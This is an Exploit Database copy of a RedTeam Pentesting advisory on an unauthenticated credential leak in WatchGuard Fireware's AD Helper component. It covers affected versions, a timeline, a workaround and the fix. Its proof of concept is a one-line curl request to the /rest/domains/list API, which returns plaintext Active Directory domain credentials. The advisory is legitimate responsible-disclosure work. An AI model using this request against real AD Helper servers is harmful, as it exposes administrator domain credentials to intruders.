WatchGuard Fireware AD Helper Component 5.8.5.10317 – Credential Disclosure

• Exploit Database
• 14 阅读

• 作者： RedTeam Pentesting GmbH
  日期： 2020-03-12
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/48203/

• # Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure 
  # Author: RedTeam Pentesting GmbH
  # Date: 2020-03-11
  # Vendor: https://www.watchguard.com
  # Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
  # CVE: N/A
  
  Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
  
  RedTeam Pentesting discovered a credential-disclosure vulnerability in
  the AD Helper component of the WatchGuard Fireware Threat Detection and
  Response (TDR) service, which allows unauthenticated attackers to gain
  Active Directory credentials for a Windows domain in plaintext.
  
  
  Details
  =======
  
  Product: WatchGuard Fireware AD Helper Component
  Affected Versions: 5.8.5.10233, < 5.8.5.10317
  Fixed Versions: 5.8.5.10317
  Vulnerability Type: Information Disclosure
  Security Risk: high
  Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
  Vendor Status: fixed version released
  Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
  Advisory Status: published
  CVE: GENERIC-MAP-NOMATCH
  CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
  
  
  Introduction
  ============
  
  "Threat Detection and Response (TDR) is a cloud-based subscription
  service that integrates with your Firebox to minimize the consequences
  of data breaches and penetrations through early detection and automated
  remediation of security threats."
  
  "Threat Detection and Response includes the AD Helper component. If your
  network has an Active Directory server, you can install AD Helper to
  manage automated installation and updates of Host Sensors on your
  network."
  
  (from the vendor's homepage)
  
  
  More Details
  ============
  
  By accessing the AD Helper's web interface, it was discovered that a
  call to an API endpoint is made, which responds with plaintext
  credentials to all configured domain controllers. There is no
  authentication needed to use the described interface and the
  installation instructions at [1] contain no indication of any way to
  configure access control.
  
  
  Proof of Concept
  ================
  
  An HTTP GET request to the path "/domains/list" of the AD Helper
  API returns, among others, the plaintext credentials to
  all configured Windows domain controllers:
  
  ------------------------------------------------------------------------
  $ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
  
  {
  "content": [
  {
  "id": 1,
  "fullyQualifiedName": "example.com",
  "logonDomain": "example.com",
  "domainControllers": "dc1.example.com",
  "username": "[DOMAIN_USER]",
  "password": "[DOMAIN_PASSWORD]",
  "uuid": "[...]",
  "servers": [
  {
  [...]
  }
  ]
  }
  ],
  "totalPages": 1,
  "totalElements": 1,
  "number": 0,
  "numberOfElements": 1
  }
  ------------------------------------------------------------------------
  
  The same request and its response can be observed when initially accessing
  the web interface. The discovered version of AD Helper responds with
  the following server banner:
  
  ------------------------------------------------------------------------
  jetty(winstone-5.8.5.10233-9.4.12.v20180830)
  ------------------------------------------------------------------------
  
  It is likely that other versions of the AD Helper Component are
  vulnerable as well.
  
  
  Workaround
  ==========
  
  Ensure API of the AD Helper Component is not reachable over the network,
  for example by putting it behind a Firewall.
  
  
  Fix
  ===
  
  Update to Version 5.8.5.10317 or later.
  
  
  Security Risk
  =============
  
  No authentication is needed to access AD Helper's web interface and the
  installation instructions at [1] describe that configured domain user
  accounts must possess at least the following privileges:
  
   * Connect to the host
   * Mount the share ADMIN$
   * Create a file on the host
   * Execute commands on the host
   * Install software on the host
  
  Access to the "ADMIN$" share implies a user with administrative
  privileges. Therefore, this vulnerability poses a high risk.
  
  
  Timeline
  ========
  
  2020-02-12 Vulnerability identified
  2020-02-19 Customer approved disclosure to vendor
  2020-02-24 Tried to contact the German branch of WatchGuard
  2020-02-27 Contacted the Dutch branch of WatchGuard
  2020-02-28 Contact to ADHelper QA Team Lead established
  2020-03-02 Advisory draft sent for verification
  2020-03-10 Vendor released fixed version and blog post
  2020-03-11 CVE ID requested
  2020-03-11 Advisory released
  
  
  References
  ==========
  
  [1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
  
  
  RedTeam Pentesting GmbH
  =======================
  
  RedTeam Pentesting offers individual penetration tests performed by a
  team of specialised IT-security experts. Hereby, security weaknesses in
  company networks or products are uncovered and can be fixed immediately.
  
  As there are only few experts in this field, RedTeam Pentesting wants to
  share its knowledge and enhance the public knowledge with research in
  security-related areas. The results are made available as public
  security advisories.
  
  More information about RedTeam Pentesting can be found at:
  https://www.redteam-pentesting.de/